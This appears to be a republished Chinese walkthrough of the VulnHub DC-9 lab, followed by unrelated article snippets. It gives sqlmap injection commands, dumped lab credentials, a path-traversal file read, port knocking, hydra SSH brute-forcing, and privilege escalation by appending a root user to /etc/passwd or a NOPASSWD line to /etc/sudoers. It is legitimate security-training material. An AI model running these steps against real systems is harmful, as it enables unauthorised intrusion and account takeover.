微信020网站怎么建立58同城兰州网站建设

news/2025/10/2 10:39:03/文章来源:
微信020网站怎么建立,58同城兰州网站建设,网站二级目录做网站,北京随喜设计网站一.环境搭建 1.下载地址 靶机下载地址#xff1a;https://download.vulnhub.com/dc/DC-9.zip 2.虚拟机配置 设置虚拟机为nat#xff0c;遇到错误点重试和是 开启虚拟机如下图所示 二.开始渗透 1. 信息收集 查找靶机的ip地址 arp-scan -l 发现靶机的ip地址为192.168.11…一.环境搭建 1.下载地址 靶机下载地址https://download.vulnhub.com/dc/DC-9.zip 2.虚拟机配置 设置虚拟机为nat遇到错误点重试和是 开启虚拟机如下图所示 二.开始渗透 1. 信息收集 查找靶机的ip地址 arp-scan -l 发现靶机的ip地址为192.168.111.137攻击机kali的ip地址为192.168.111.128  用nmap扫描其开启服务和端口 nmap -p- -sV 192.168.111.137 发现ssh和http服务打开  用浏览器打开其http服务如下图  发现一句提示翻译一下看看 点击这个search进行抓包 发现此处存在sql注入 2.sql注入 用sqlmap进行注入 sqlmap -u http://192.168.111.137/results.php --data search --dbs 跑users表 sqlmap -u http://192.168.111.137/results.php --data search -D users --tables sqlmap -u http://192.168.111.137/results.php --data search -D users -T UserDetails --dump -------------------------------------------------------------------------- | id | lastname | password | reg_date | username | firstname | -------------------------------------------------------------------------- | 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary | | 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie | | 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred | | 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney | | 5 | Cat | TCTheBoyz | 2019-12-29 16:58:26 | tomc | Tom | | 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry | | 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma | | 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty | | 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler | | 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey | | 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel | | 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross | | 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica | | 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe | | 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter | | 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald | | 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott | --------------------------------------------------------------------------下爆staff的 sqlmap -u http://192.168.111.137/results.php --data search -D Staff --tables sqlmap -u http://192.168.111.137/results.php --data search -D Staff -T Users --dump 账号获取到了密码被爆破出来了 看一下StaffDetails这里虚拟机的http直接被访问到502了重启一下靶机即可 sqlmap -u http://192.168.111.137/results.php --data search -D Staff -T StaffDetails --dump 利用之前获取到的账号密码admin/transorbital1进行用户登录 登录成功下面显示file does not exist 怀疑包含了某文件所以尝试文件包含 看大佬的wp访问该路径获取关键信息 http://192.168.111.137/welcome.php?file../../../../../../../../../etc/knockd.conf [options] UseSyslog [openSSH] sequence 7469,8475,9842 seq_timeout 25 command /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags syn [closeSSH] sequence 9842,8475,7469 seq_timeout 25 command /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags syn 这玩意也不知道啥意思问问万能的ai吧 [openSSH] sequence 7469,8475,9842接收到的 TCP 数据包的序列号序列用于识别 SSH 连接尝试。seq_timeout 25在指定时间以秒为单位内如果收到序列号序列中的下一个序列号则认为是有效的 SSH 连接尝试。command /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags syn如果收到有效的 SSH 连接尝试则执行此命令。该命令将允许来自 IP 地址 %IP% 的 TCP 端口 22 的连接。 [closeSSH] sequence 9842,8475,7469与 [openSSH] 相同但用于识别 SSH 连接关闭。seq_timeout 25与 [openSSH] 相同。command /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags syn如果收到有效的 SSH 连接关闭则执行此命令。该命令将删除允许来自 IP 地址 %IP% 的 TCP 端口 22 的连接的规则。 knockd字面意思是敲只是这里敲的是端口而且需要按照顺序‘敲’端口。如果敲击规则匹配则可以让防火墙实时更改策略。从而达到开关防火墙的目的。  也就是说黑客进行直接扫描端口扫描不出来只有进行固定knockd的访问才能打开 查看配置文件发现需要连续访问的端口轮流敲这些端口 nmap 192.168.111.137 -p 7469 nmap 192.168.111.137 -p 8475 nmap 192.168.111.137 -p 9842 nmap -p 22 192.168.111.137 查看到ssh服务已经开启 3.ssh暴力破解 将前面sql注入出来的用户名和密码分别保存在users.txt和pass.txt  将前面保存sqlmap自动保存的csv文件复制到物理机进行操作 users.txt marym julied fredf barneyr tomc jerrym wilmaf bettyr chandlerb joeyt rachelg rossg monicag phoebeb scoots janitor janitor2pass.txt 3kfs86sfd 468sfdfsd2 4sfd87sfd1 RocksOff TCTheBoyz B8m#48sd Pebbles BamBam01 UrAG0D! Passw0rd yN72#dsd ILoveRachel 3248dsds7s smellycats YR3BVxxxw87 Ilovepeepee Hawaii-Five-0利用工具进行ssh账号密码爆破 hydra -L users.txt -P pass.txt 192.168.111.137 ssh [22][ssh] host: 192.168.111.137 login: chandlerb password: UrAG0D! [22][ssh] host: 192.168.111.137 login: joeyt password: Passw0rd [22][ssh] host: 192.168.111.137 login: janitor password: Ilovepeepee4.获得shell 根据大佬wp可知其他两个用户登录后无作用 登录janitor ls -al 查看到隐藏文件 cd .secrets-for-putin cat passwords-found-on-post-it-notes.txt BamBam01 Passw0rd smellycats P0Lic#10-4 B4-Tru3-001 4uGU5T-NiGHts 将这一串密码加入刚刚的爆破密码中重新进行爆破生成newpass.txt newpass.txt 3kfs86sfd 468sfdfsd2 4sfd87sfd1 RocksOff TCTheBoyz B8m#48sd Pebbles BamBam01 UrAG0D! Passw0rd yN72#dsd ILoveRachel 3248dsds7s smellycats YR3BVxxxw87 Ilovepeepee Hawaii-Five-0 BamBam01 Passw0rd smellycats P0Lic#10-4 B4-Tru3-001 4uGU5T-NiGHts 重新进行爆破 hydra -l users.txt -P newpass.txt 192.168.111.137 ssh 爆破出一个新用户  进行ssh连接 fredf/B4-Tru3-001 ssh fredf192.168.111.137 5.提权 进行提权 sudo -l 列出sudo权限的命令这里发现fred用户在NOPASSWD的情况下可以使用root权限运行这个test文件 cd到该目录下尝试运行发现为python文件 找到这个test.py文件 find / -name test.py 2/dev/null查看文件 #!/usr/bin/pythonimport sysif len (sys.argv) ! 3 :print (Usage: python test.py read append)sys.exit (1)else :f open(sys.argv[1], r)output (f.read())f open(sys.argv[2], a)f.write(output)f.close()发现代码作用需要两个文件把第一文件追加到第二个文件后 openssl生成密码前一个mlws为账号,后一个1900为要加密的密码 openssl passwd -1 -salt mlws 1900 $1$mlws$VPTJ3t70fTytbTKtREHSF1 把下面内容写入一个文件 echo mlws:$1$mlws$VPTJ3t70fTytbTKtREHSF1:0:0::/root:/bin/bash /tmp/tiquan 使用test文件将该文件的内容写入到passwd中 sudo ./test /tmp/tiquan /etc/passwd 切换账户 su mlws 成功提权 成功获取到最终的flag 三.其他 1.可以用knock命令直接对三个端口进行敲击 需要安装knock knock 192.168.111.137 7469 8475 9842 2.提权可构造权限行,写入/etc/sudoers echo fredf ALL(root) NOPASSWD:ALL /tmp/tq.txt sudo /opt/devstuff/dist/test/test /tmp/tq.txt /etc/sudoers sudo su root 一样可以提权成功  至此dc1-9靶机全部完成

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/924801.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

北京做网站哪家强职业培训机构

元二分搜索(Steven Skiena 在《算法设计手册》第 134 页中也称为单边二分搜索)是二分搜索的一种修改形式,它以增量方式构建数组中目标值的索引。与普通二分搜索一样,元二分搜索需要 O(log n) 时间。 元二分搜索,也称为…

怎么用手机做网站编辑品牌创意设计

JavaScript数组的 forEach()方法调用数组中的每个元素。语法array.forEach(callback[, thisObject]);下面是参数的详细信息:callback : 函数测试数组的每个元素。thisObject : 对象作为该执行回调时使用。返回值:返回创建数组。兼容性:这种方法是一个Jav…

题解:P7810 [JRKSJ R2] Upper

题目描述 有 \(n\) 张扑克,第 \(i\) 张扑克上写有一个正整数 \(a_i\)。 现在要把扑克划分成若干个合法的连续子段,其中,一个连续子段 \([l,r]\)“合法”当且仅当这个子段同时满足两个条件:\(a_l< a_r\) \(\gcd(…

网站关键词排名消失动漫设计与制作好学吗

Spring Data REST 提供了一种简单的方式来暴露 JPA 实体为 RESTful 服务&#xff0c;这使得构建基于 REST 的数据服务变得非常快速和高效。下面是一个使用 Spring Data REST 构建通用架构的基本示例&#xff1a; 首先&#xff0c;我们需要创建一个实体类&#xff08;例如&…

记录自己被AWS坑了6刀

AWS(Amazon Web services) 亚马逊云坑了我6刀。我被AWS反向薅羊毛了$6美元。 我试用了AWS的一年免费EC2服务器。 上个月开启了一个 load balancer ,我以为它和 cloudfront 一样是只按流量收费的,想不到 load balance…

Spring 框架中 ​​RestTemplate 的使用方法​​ - 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

桂林新站优化网站模板后台怎么做

输入一个英文句子&#xff0c;翻转句子中单词的顺序&#xff0c;但单词内字符的顺序不变。为简单起见&#xff0c;标点符号和普通字母一样处理。例如输入字符串"I am a student. "&#xff0c;则输出"student. a am I"。 示例 1&#xff1a; 输入: "…

tnkstat3e-merge-0

统计思维(程序员的概率统计)第三版(一)原文:allendowney.github.io/ThinkStats/index.html 译者:飞龙 协议:CC BY-NC-SA 4.0统计思维第三版原文:allendowney.github.io/ThinkStats/index.htmlThink Stats 是面…

如何用pivotby函数实现数据透视(1)

背景 ========================================================================================= 因为每次都要统计当前毕业的毕业去向落实率,每次都在拉两次透视表,做N次VLOOPUP,再写一个求百分比的公式, ---…

网站建设 拖欠尾款水果建设网站前的市场分析

指针初阶 1.指针是什么2.指针和指针类型2.1 指针-整数2.2 指针的解引用 3.野指针3.1 野指针成因3.2如何避免野指针 4.指针运算4.1 指针-整数4.2 指针-指针4.3 指针的关系运算 5.指针和数组6.二级指针7.指针数组 1.指针是什么 指针是什么&#xff1f; 指针理解的2个要点&#xf…

JavaScript零基础入门速通(完整) - 指南

JavaScript零基础入门速通(完整) - 指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Mo…

企业为什么做平台网站企业网站建设的实验报告

准备工作 这部分其实在谷歌或者百度上搜索下就可以完成的&#xff0c;可是我就是想再啰嗦一遍&#xff0c;说不定有比我更懒的同学呢哈哈~ 第一步 Python的安装配置 打开官网: https://www.python.org/downloads/ 目前官网上已经更新到3.6.1啦&#xff08;这更新速度我是服的&…

完整教程:Nginx反向代理核心原理揭秘

完整教程:Nginx反向代理核心原理揭秘pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Mona…

详细介绍:五大关系数据库(sqlserver、mysql、oracle、pgsql、sqlite)的对象名称和转义字符

详细介绍:五大关系数据库(sqlserver、mysql、oracle、pgsql、sqlite)的对象名称和转义字符2025-10-02 10:17 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !importa…

@RequestParam 什么时候可以省略?

参数名一致时 当HTTP请求中的参数名与控制器方法参数名完全一致时,@RequestParam可省略。 非必需参数 当请求参数为非必需(即允许未传递该参数时),可通过设置@RequestParam(required=false)或省略注解,此时即使未…

做全景效果图的网站wordpress适应ie6

《“爱读书”--给你讲技术》&#xff0c;我来看书&#xff0c;你来进步&#xff0c;让我们开始吧&#xff01;本书简介书名为《轻量级JavaEE企业应用实战》&#xff0c;是本人在学习JavaEE框架的时候阅读的第一本书&#xff0c;本书对于框架及相关基础知识讲述的比较详细和浅显…

段页式管理方式

分段分页管理中最大的优缺点优点 缺点分页管理 内存空间利用率高,不会产生外部碎片,只会有少量的页内碎片 不方便按照逻辑模块实现信息的共享和保护分段管理 很方便按照逻辑模块实现信息的共享和保护 如果段长过大,…

网站建设与单位干部作风的关系网站竞价推广都有哪些

有些粉丝&#xff0c;希望对自定义业务中&#xff0c;驳回到发起人进行处理&#xff0c;比如可以重新进行发起流程&#xff0c;下面就给出一种方式&#xff0c;当然不一定是最好的方式&#xff0c;只是提供一种参考而已&#xff0c;以后可以考虑动态根据流程状态或节点信息进行…

推进电子设计革新:为什么模拟仿真正是核心助力?

在高速发展的电子设计领域,模拟仿真已成为现代工程师的「得力助手」,它不仅能快速验证设计,还能显著提升流程效率与质量。1、仿真的三大优势:提前预见,精准优化,高效迭代 错误无处遁形 仿真能在设计实施前及时暴…

河北网站seo策划公司变更地址需要多少钱

T2-简单 MST题解 题意 设 ω ( x ) \omega(x) ω(x)为 x x x的质因数所构成的集合大小&#xff1b; 给两个正整数 l l l r r r&#xff0c;图上有 r − l 1 r-l1 r−l1个点&#xff0c;为 l , l 1 , l 2 , ⋯ , r − 2 , r − 1 , r l,l1,l2,\cdots,r-2,r-1,r l,l1,l2,…